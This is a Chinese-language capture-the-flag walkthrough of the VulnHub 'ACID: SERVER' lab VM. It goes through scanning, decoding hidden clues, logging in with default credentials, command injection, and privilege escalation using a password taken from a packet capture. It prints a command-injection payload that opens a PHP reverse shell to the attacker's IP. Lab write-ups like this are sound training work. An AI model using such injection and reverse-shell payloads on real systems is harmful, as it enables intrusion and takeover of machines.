VulnHub渗透测试实战靶场 - ACID: SERVER

VulnHub渗透测试实战靶场 - ACID: SERVER

环境下载

戳此进行环境下载

ACID: SERVER靶机搭建

将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可

VulnHub渗透测试实战靶场 - ACID: SERVER

VulnHub渗透测试实战靶场 - ACID: SERVER

渗透测试

信息收集

使用Kali自带的工具netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24

VulnHub渗透测试实战靶场 - ACID: SERVER

用Nmap对获取到的靶机IP地址进行扫描:sudo nmap -sS -A -p 1-65535 192.168.246.130,发现其33447端口是开放的

VulnHub渗透测试实战靶场 - ACID: SERVER

漏洞挖掘

查看33447端口:http://192.168.246.130:33447/,F12查看源码时发现一个十六进制字符串0x643239334c6d70775a773d3d转字符串得到d293LmpwZw==解base64得到wow.jpg

VulnHub渗透测试实战靶场 - ACID: SERVER

dirsearch爆破一下web目录:python3 dirsearch.py -u 192.168.246.130:33447 -e *.php

VulnHub渗透测试实战靶场 - ACID: SERVER

发现存在http://192.168.246.130:33447/images/,结合上一步解密得到的图片名字
访问:http://192.168.246.130:33447/images/wow.jpg,将图片下载下来分析:strings wow.jpg

在图片的结尾发现一串可疑字符:

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

用burpsuite的Decoder模块解码得到:7aee0f6d588ed9905ee37f16a7c610d4

VulnHub渗透测试实战靶场 - ACID: SERVER

看长度有点像hash值,尝试MD5解密,得到:63425

VulnHub渗透测试实战靶场 - ACID: SERVER

DirBuster扫描一下web目录,发现index.php、error.php、cake.php、hacked.php、include.php

VulnHub渗透测试实战靶场 - ACID: SERVER

/Challenge/index.php页面的源代码中,可以找到js/forms.js打开发现在文件中有版权信息

VulnHub渗透测试实战靶场 - ACID: SERVER

谷歌搜索:peredur.net form_js,网页第一个链接就是,查看commit,在README.md中找到Email和Password相关信息

Username	: test_user 
Email		: test@example.com 
Password	: 6ZaxN2Vzm9NUJT2y

VulnHub渗透测试实战靶场 - ACID: SERVER

利用找到的默认信息成功登录,点击页面链接跳转到http://192.168.246.131:33447/Challenge/include.php

VulnHub渗透测试实战靶场 - ACID: SERVER

查看源码,在底部发现0x5933566a4c6e4a34626e413d,依照前面的思路解密得到Y3VjLnJ4bnA=,base64再次解密得到cuc.rxnp,rot13解密得到php.ekac,反过来就是cake.php

访问cake.php,根据页面提示再次进行目录扫描:python3 dirsearch.py -u 192.168.246.131:33447/Challenge/Magic_Box -e *.php

VulnHub渗透测试实战靶场 - ACID: SERVER
VulnHub渗透测试实战靶场 - ACID: SERVER

根据扫描结果,访问http://192.168.246.131:33447/Challenge/Magic_Box/command.php,测试后发现存在命令执行漏洞

VulnHub渗透测试实战靶场 - ACID: SERVER

getshell

起一个监听,在存在命令注入的页面执行:

www.baidu.com;php -r '$sock=fsockopen("192.168.246.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

VulnHub渗透测试实战靶场 - ACID: SERVER

提权

信息查找发现两个可疑用户:acid、saman

VulnHub渗透测试实战靶场 - ACID: SERVER

在acid的家目录加看到一个名为.sudo_as_admin_successful大小为0的文件,提示普通用户可以切换为root用户

VulnHub渗透测试实战靶场 - ACID: SERVER

查找acid这个用户的文件来获取他的密码来切换账户:find / -user acid 2>/dev/null,发现hint.pcapng流量包文件

VulnHub渗透测试实战靶场 - ACID: SERVER

用python搭建Server下载下来进行流量分析:python -m SimpleHTTPServer 9999

VulnHub渗透测试实战靶场 - ACID: SERVER

分析TCP协议,可以发现一段明文传输的对话,发现saman用户及其密码1337hax0r

VulnHub渗透测试实战靶场 - ACID: SERVER

用得到的密码切换saman用户后再sudo su提权到root,成功拿到root权限

VulnHub渗透测试实战靶场 - ACID: SERVER

上一篇:MySQL基础6——事务,ACID,并发异常


下一篇:三面美团、四面阿里成功斩下offer,看完直接跪服